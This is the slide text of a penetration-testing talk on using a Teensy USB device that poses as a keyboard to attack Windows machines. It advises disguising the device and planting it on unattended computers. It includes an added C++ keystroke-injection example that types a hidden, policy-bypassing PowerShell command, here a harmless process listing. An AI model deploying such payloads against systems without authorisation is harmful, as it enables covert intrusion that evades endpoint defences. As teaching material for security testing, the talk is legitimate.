MERE PAAS TEENSY HAI (Hindi: “I have a Teensy”) OR COMPROMISING A HIGHLY SECURE ENVIRONMENT PART 2 Nikhil Mittal (SamratAshok)
ABOUT ME SamratAshok Twitter - @nikhil_mitt Penetration Tester with PwC India I am interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. Creator of Kautilya and Maareech Previous Talks Ultimate Pen Testing: Compromising a highly secure environment Clubhack’10 Here are your Keystrokes Hackfest’11 Upcoming Talks Kautilya: Teensy beyond shell Blackhat Abu Dhabi’11
OVERVIEW Why the Title? Current State of Pentesting Questions being raised to us The answer to the questions What’s done What we will do Limitations Future Conclusion
WHY THE TITLE? What I told the ClubHack team: I talked about compromising a highly secure environment last year, let’s continue with the pwnage!! Thanks to the team for buying that and allowing me to speak. The real reason:
A TYPICAL PEN TEST SCENARIO A client engagement comes with a list of IP addresses. We need to complete the assignment in a very restrictive time frame. The pressure is on us to deliver a “good” report with some high-severity findings (that “High” inside a red box).
CURRENT STATE OF PENTESTING Scan -> Vuln -> Exploit -> Report
This is the best-case scenario; only the lucky ones find it. Generally, legacy enterprise applications or business-critical applications are not upgraded. There is almost no fun in doing it that way.
SOME OF US DO IT BETTER Enum -> Scan -> Exploit -> Report
SOME OF US DO IT EVEN BETTER Enum + Intel -> Scan -> Exploit -> Post Exp -> Report
WHY DO WE NEED TO EXPLOIT? To gain access to the systems. This shows the real threat to clients: that we can actually make an impact on their business. No more “so-what”. We can create reports with “High” severity findings. <Audience>
WHAT DO WE EXPLOIT? Memory corruption bugs (server side, client side). Humans. Misconfigurations. Design problems. <Audience>
QUESTIONS BEING RAISED TO US Many times we find some vulnerabilities but can’t exploit them: no public exploits available; not allowed on the system; a countermeasure blocks it. Kya hai tumhare paas? (“What do you have?”)
QUESTIONS BEING RAISED TO US Hardened systems. Patches in place. Countermeasures blocking scans and exploits. Security incident monitoring and blocking. Kya hai tumhare paas? (“What do you have?”)
QUESTIONS BEING RAISED TO US Just a bad day. Exploit completed but no session was generated :P Kya hai tumhare paas? (“What do you have?”)
ALTERNATIVES Open file shares. Sticky slips. Social engineering attacks. Man in the Middle (many types). SMB Relay. <Audience>
THE ANSWER TO THE QUESTIONS: TEENSY A USB micro-controller device. We will use the Teensy++, the larger variant of the Teensy with more flash and more I/O pins. Available for $24 from pjrc.com. Mere paas Teensy hai (“I have a Teensy”).
USING TEENSY Find an unattended system and insert the Teensy into a USB port, or fool your victim by disguising it as a mouse, USB toy, thumb drive etc. Generally the Teensy needs just a minute to complete the job. You can program it according to your needs. Because it enumerates as a plain USB keyboard (HID) and only sends keystrokes, it is usually neither detected nor blocked by endpoint protection or device control, which makes it great for popping shells.
WHAT’S DONE Arduino-based attack vector in the Social-Engineer Toolkit (SET) by David Kennedy. Contains some really awesome payloads. Almost all payloads are for popping shells.
WHAT WE WILL DO Teensy can be used for much more than popping shells: it can perform pre- and post-exploitation tasks. We will have a detailed look at some of these payloads and understand how to create payloads as per our needs.
DESCRIPTION OF PAYLOADS Mostly for Windows, as desktops are generally Windows-based. Payloads vary from one-line commands to powerful scripts. If you know PowerShell scripting, the payloads will make more sense and will be easier to customize.
LIMITATIONS Limited storage on the Teensy; resolved by attaching an SD card to the Teensy. Inability to “read” from the system: traffic is one way (device to host), so the payload has to assume how the victim OS responds and cannot verify that a dialog opened or a command finished.
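Added example, not a slide from the talk and not code from Kautilya or SET: a minimal Teensy keystroke payload of the “one-line command” kind described above, showing both how a PowerShell one-liner is typed through the Run dialog and how the one-way-traffic limitation is handled with fixed delays, since the device cannot confirm that the dialog is open. It is written STL-free so it builds for the AVR-based Teensy++ 2.0 under Teensyduino (USB Type set to “Keyboard”; the Keyboard.press/releaseAll key codes KEY_R, KEY_ENTER and MODIFIERKEY_GUI are Teensyduino’s); on a desktop compiler the ARDUINO branch is skipped and the same steps are rendered as text for review. The payload command, the delay value and the output path are illustrative assumptions.

```cpp
// Added example: Teensy keystroke payload, host-testable. Not from the original talk.
#include <stdio.h>
#include <string.h>

#ifdef ARDUINO
#include <Arduino.h>
#else
#include <string>
#endif

enum StepKind { STEP_WAIT, STEP_CHORD, STEP_TYPE };

struct Step {
    StepKind kind;
    const char *text;   // STEP_TYPE: text to type; STEP_CHORD: "WIN+R" or "ENTER"
    unsigned ms;        // STEP_WAIT: pause in milliseconds
};

// The device only sends keystrokes and never reads the screen, so every UI
// transition is followed by a fixed, generous pause (assumed value).
static const unsigned UI_DELAY_MS = 1500;

// Wrap a PowerShell one-liner so it runs hidden, without a profile and
// regardless of execution policy. `script` must not contain double quotes.
int powershellOneLiner(const char *script, char *out, size_t outLen) {
    return snprintf(out, outLen,
                    "powershell -NoP -W Hidden -Ep Bypass -C \"%s\"", script);
}

// Fill `steps` (capacity `cap`) with the Win+R, command, Enter sequence.
// Returns the number of steps written.
size_t runDialogPayload(const char *cmd, Step *steps, size_t cap) {
    const Step seq[] = {
        { STEP_WAIT,  "",      UI_DELAY_MS }, // let the host enumerate the HID device
        { STEP_CHORD, "WIN+R", 0 },           // open the Run dialog
        { STEP_WAIT,  "",      UI_DELAY_MS }, // assume it is up; we cannot check
        { STEP_TYPE,  cmd,     0 },
        { STEP_CHORD, "ENTER", 0 },
        { STEP_WAIT,  "",      UI_DELAY_MS }, // let the command start before unplugging
    };
    size_t n = sizeof(seq) / sizeof(seq[0]);
    if (n > cap) n = cap;
    memcpy(steps, seq, n * sizeof(Step));
    return n;
}

#ifdef ARDUINO
// Teensyduino: Keyboard.press/releaseAll take key codes, Keyboard.print types ASCII.
void play(const Step *steps, size_t n) {
    for (size_t i = 0; i < n; i++) {
        switch (steps[i].kind) {
        case STEP_WAIT: delay(steps[i].ms); break;
        case STEP_TYPE: Keyboard.print(steps[i].text); break;
        case STEP_CHORD:
            if (strcmp(steps[i].text, "WIN+R") == 0) {
                Keyboard.press(MODIFIERKEY_GUI);
                Keyboard.press(KEY_R);
            } else {
                Keyboard.press(KEY_ENTER);
            }
            Keyboard.releaseAll();
            break;
        }
    }
}

void setup() {
    char cmd[256];
    Step steps[8];
    // Illustrative post-exploitation one-liner (assumed output path).
    powershellOneLiner("Get-Process | Out-File C:\\Users\\Public\\procs.txt", cmd, sizeof cmd);
    play(steps, runDialogPayload(cmd, steps, 8));
}
void loop() {}
#else
// Host build: render the step list, one line per step, to review before flashing.
std::string render(const Step *steps, size_t n) {
    std::string out;
    char line[320];
    for (size_t i = 0; i < n; i++) {
        switch (steps[i].kind) {
        case STEP_WAIT:  snprintf(line, sizeof line, "WAIT %u\n", steps[i].ms); break;
        case STEP_CHORD: snprintf(line, sizeof line, "CHORD %s\n", steps[i].text); break;
        case STEP_TYPE:  snprintf(line, sizeof line, "TYPE %s\n", steps[i].text); break;
        }
        out += line;
    }
    return out;
}

int main(void) {
    char cmd[256];
    Step steps[8];
    powershellOneLiner("Get-Process | Out-File C:\\Users\\Public\\procs.txt", cmd, sizeof cmd);
    size_t n = runDialogPayload(cmd, steps, 8);
    fputs(render(steps, n).c_str(), stdout);
    return 0;
}
#endif
```

Keeping the step list separate from the HID calls is what makes the one-way limitation manageable: the delays and the order of keystrokes can be reviewed on the host, and the same list can be replayed with a longer UI_DELAY_MS for a slow target without touching the typing logic.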
FUTURE Kautilya: improvement of the current payloads; new payloads for non-traditional shells; dropping executables using additional storage (already done).
CONCLUSION If used wisely, the Teensy can serve as a complete penetration testing device, though with its own limitations. It’s a cheap device, so use it. Please use Kautilya and give feedback after it is released. Mere paas Teensy hai (“I have a Teensy”).